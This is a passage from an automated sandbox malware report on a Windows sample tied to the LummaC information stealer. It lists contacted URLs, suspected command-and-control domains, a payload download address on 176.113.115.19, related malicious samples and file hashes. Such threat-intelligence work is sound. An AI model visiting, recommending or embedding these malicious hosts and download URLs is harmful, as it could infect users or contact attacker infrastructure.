                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/workshop/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://login.steampowered.com/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbEB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://store.steampowered.com/legal/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviEEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://176.113.115.19/ScreenUpdateSync.exe(L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539968169.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000003.4407439602.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://apporholis.shop:443/apiiPEB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://recaptcha.netEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://store.steampowered.com/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://steamcommunity.comEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://127.0.0.1:27060EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://crl.mEB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://help.steampowered.com/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://api.steampowered.com/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://store.steampowered.com/points/shopEB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://store.steampowered.com/account/cookiepreferences/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://store.steampowered.com/mobileEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://skidjazzyric.click:443/apiEB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://steamcommunity.com/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                172.67.179.207
                                                                                                                                                                                                                post-to-me.comUnited States
                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                104.102.49.254
                                                                                                                                                                                                                steamcommunity.comUnited States
                                                                                                                                                                                                                16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                176.113.115.19
                                                                                                                                                                                                                unknownRussian Federation
                                                                                                                                                                                                                49505SELECTELRUfalse
                                                                                                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                Analysis ID:1589517
                                                                                                                                                                                                                Start date and time:2025-01-12 17:51:01 +01:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 8m 54s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Sample name:L7GNkeVm5e.exe
                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                Original Sample Name:f7db525dd98ee5fbdc9c11d59b93985b.exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal100.troj.evad.winEXE@4/7@11/3
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                • Successful, ratio: 94%
                                                                                                                                                                                                                • Number of executed functions: 41
                                                                                                                                                                                                                • Number of non-executed functions: 341
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.31.73, 13.107.246.45, 20.109.210.53
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                11:52:00API Interceptor9115115x Sleep call for process: L7GNkeVm5e.exe modified
                                                                                                                                                                                                                11:52:04API Interceptor3x Sleep call for process: EB86.tmp.exe modified
                                                                                                                                                                                                                11:52:25API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                172.67.179.207NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                  EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                    104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                    • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                    http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                    176.113.115.19NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    post-to-me.comNDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                    lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                    Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                    xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                    DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                    fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                    chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                    steamcommunity.comNDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    x.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    CLOUDFLARENETUS3bSDIpSIdF.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                    NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                    lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.67.185.28
                                                                                                                                                                                                                                    UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                    • 104.21.14.233
                                                                                                                                                                                                                                    rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.26.11.53
                                                                                                                                                                                                                                    mNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.67.162.17
                                                                                                                                                                                                                                    gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                                                                                    SELECTELRUNDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19
                                                                                                                                                                                                                                    g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19
                                                                                                                                                                                                                                    lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19
                                                                                                                                                                                                                                    176.113.115.170.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                                                                                                    • 176.113.115.170
                                                                                                                                                                                                                                    b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19
                                                                                                                                                                                                                                    Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19
                                                                                                                                                                                                                                    1In8uYbvZJ.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 176.113.115.177
                                                                                                                                                                                                                                    xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19
                                                                                                                                                                                                                                    DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19
                                                                                                                                                                                                                                    fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19
                                                                                                                                                                                                                                    AKAMAI-ASUS3bSDIpSIdF.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 23.57.90.146
                                                                                                                                                                                                                                    NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    mNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 23.49.251.20
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    sE5IdDeTp2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    5vrRrFN56j.exeGet hashmaliciousBdaejecBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    rii2.mp3.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    gem2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\EB86.tmp.exeNDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeNDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                Entropy (8bit):0.9672853563144779
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:IBQqhQasrhBVod7Rr6tQXIDcQqc6mcEKcw34eE+HbHg/wWGTf3hOyc45WAU6NCUo:UphQag00kigMijsFRzuiFCZ24IO8c
                                                                                                                                                                                                                                                MD5:22014D14F2C79FD99EEC56E1572ACAAF
                                                                                                                                                                                                                                                SHA1:4EDB1A2771E73B061FFF46D3BB7FB7157B82DB51
                                                                                                                                                                                                                                                SHA-256:5152E8D793102C0263F2F7663818BC05BB514C91438D96ACF957A6B1C96D02B5
                                                                                                                                                                                                                                                SHA-512:5DC0215E46AD13374F89F7499CCEBBCF83A5AB0841D76C342F337EDB386F6EC3BE0184B484D00750578405FC476CFDC56B8393EA792ED9FDAD74ACCC0F4DB1A7
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:low
